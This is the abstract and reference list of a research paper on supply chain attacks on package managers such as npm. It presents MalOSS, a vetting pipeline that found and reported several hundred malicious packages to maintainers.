Measuring and Preventing Supply Chain Attacks on Package Managers

Package managers have become a vital part of the modern software development process. They allow developers to reuse third-party code, share their own code, minimize their codebase, and simplify the build process. However, recent reports showed that hundreds of malware have sneaked into package managers, which have been downloaded millions of times, posing significant security risks to developers as well as end-users. For example, eslint-scope, a package with millions of weekly downloads in Npm, was compromised to steal credentials from developers. To understand the attacks on package managers and the misplaced trust that makes them possible, we propose a comparative framework to study the package managers for interpreted languages. By systematically analyzing the recent attacks using our framework, we can identify security gaps and broken trust in the package manager ecosystem. Based on these insights, we propose and implement a vetting pipeline, MalOSS, to perform metadata, static and dynamic analysis on packages and flag the suspicious ones. Through iterative labeling, we identified and reported 339 malware to package manager maintainers. 278 (82 percent) of them have been confirmed and removed, and 3 of them with more than 100,000 downloads have been assigned CVEs. To help secure the ecosystem, we propose actionable security improvements for package manager maintainers and suggestions for other stakeholders.

[1]  Justin Cappos,et al.  Package Management Security , 2008 .

[2]  Brendan Gregg,et al.  Dtrace: Dynamic Tracing in Oracle Solaris, Mac OS X and Freebsd , 2011 .

[3]  Christopher Krügel,et al.  Hulk: Eliciting Malicious Behavior in Browser Extensions , 2014, USENIX Security Symposium.

[4]  Jacques Klein,et al.  FlowDroid: precise context, flow, field, object-sensitive and lifecycle-aware taint analysis for Android apps , 2014, PLDI.

[5]  Markus Zimmermann,et al.  Small World with High Risks: A Study of Security Threats in the npm Ecosystem , 2019, USENIX Security Symposium.

[6]  Joshua Sunshine,et al.  Detecting Suspicious Package Updates , 2019, 2019 IEEE/ACM 41st International Conference on Software Engineering: New Ideas and Emerging Results (ICSE-NIER).

[7]  Michael Backes,et al.  HideNoSeek: Camouflaging Malicious JavaScript in Benign ASTs , 2019, CCS.

[8]  Jonathan M. Smith,et al.  BreakApp: Automated, Flexible Application Compartmentalization , 2018, NDSS.

[9]  Eleni Constantinou,et al.  On the Impact of Security Vulnerabilities in the npm Package Dependency Network , 2018, 2018 IEEE/ACM 15th International Conference on Mining Software Repositories (MSR).

[10]  Ashish Jadhav,et al.  Evolution of evasive malwares: A survey , 2016, 2016 International Conference on Computational Techniques in Information and Communication Technologies (ICCTICT).

[11]  Quan Chen,et al.  Mystique: Uncovering Information Leakage from Browser Extensions , 2018, CCS.

[12]  Yan Shoshitaishvili,et al.  Angr - The Next Generation of Binary Analysis , 2017, 2017 IEEE Cybersecurity Development (SecDev).

[13]  Dongyoon Lee,et al.  A Sense of Time for JavaScript and Node.js: First-Class Timeouts as a Cure for Event Handler Poisoning , 2018, USENIX Security Symposium.

[14]  Xiangyu Zhang,et al.  J-Force: Forced Execution on JavaScript , 2017, WWW.

[15]  Reza Curtmola,et al.  in-toto: Providing farm-to-table guarantees for bits and bytes , 2019, USENIX Security Symposium.

[16]  Gianluca Borello,et al.  System and Application Monitoring and Troubleshooting with Sysdig , 2015 .

[17]  Zexin Lu,et al.  Survey on malware anti-analysis , 2014, Fifth International Conference on Intelligent Control and Information Processing.

[18]  Justin Cappos,et al.  Mercury: Bandwidth-Effective Prevention of Rollback Attacks Against Community Repositories , 2017, USENIX Annual Technical Conference.

[19]  Guodong Li,et al.  SymJS: automatic symbolic testing of JavaScript web applications , 2014, SIGSOFT FSE.

[20]  Justin Cappos,et al.  A look in the mirror: attacks on package managers , 2008, CCS.

[21]  Eric Bodden,et al.  StubDroid: Automatic Inference of Precise Data-Flow Summaries for the Android Framework , 2016, 2016 IEEE/ACM 38th International Conference on Software Engineering (ICSE).

[22]  Richard Gordon,et al.  web2py Application Development Cookbook , 2012 .

[23]  Giovanni Vigna,et al.  MalGene: Automatic Extraction of Malware Analysis Evasion Signature , 2015, CCS.

[24]  Christopher Krügel,et al.  BareCloud: Bare-metal Analysis-based Evasive Malware Detection , 2014, USENIX Security Symposium.

[25]  Kieran McLaughlin,et al.  Obfuscation: The Hidden Malware , 2011, IEEE Security & Privacy.

[26]  Wesley J. Chun,et al.  Python Web Development with Django , 2008 .

[27]  Benjamin Livshits,et al.  SYNODE: Understanding and Automatically Preventing Injection Attacks on NODE.JS , 2018, NDSS.

[28]  Michael Pradel,et al.  Freezing the Web: A Study of ReDoS Vulnerabilities in JavaScript-based Web Servers , 2018, USENIX Security Symposium.

[29]  Teddy Reed,et al.  osquery—Windows, macOS, Linux Monitoring and Intrusion Detection , 2017 .

[30]  Bülent Yener,et al.  A Survey On Automated Dynamic Malware Analysis Evasion and Counter-Evasion: PC, Mobile, and Web , 2017, ROOTS.

[31]  Justin Cappos,et al.  Diplomat: Using Delegations to Protect Community Repositories , 2016, NSDI.

[32]  Christopher Krügel,et al.  TriggerScope: Towards Detecting Logic Bombs in Android Applications , 2016, 2016 IEEE Symposium on Security and Privacy (SP).

[33]  Arun Madan,et al.  Front cover Securely Adopting Mobile Technology Innovations for Your Enterprise Using IBM Security Solutions , 2013 .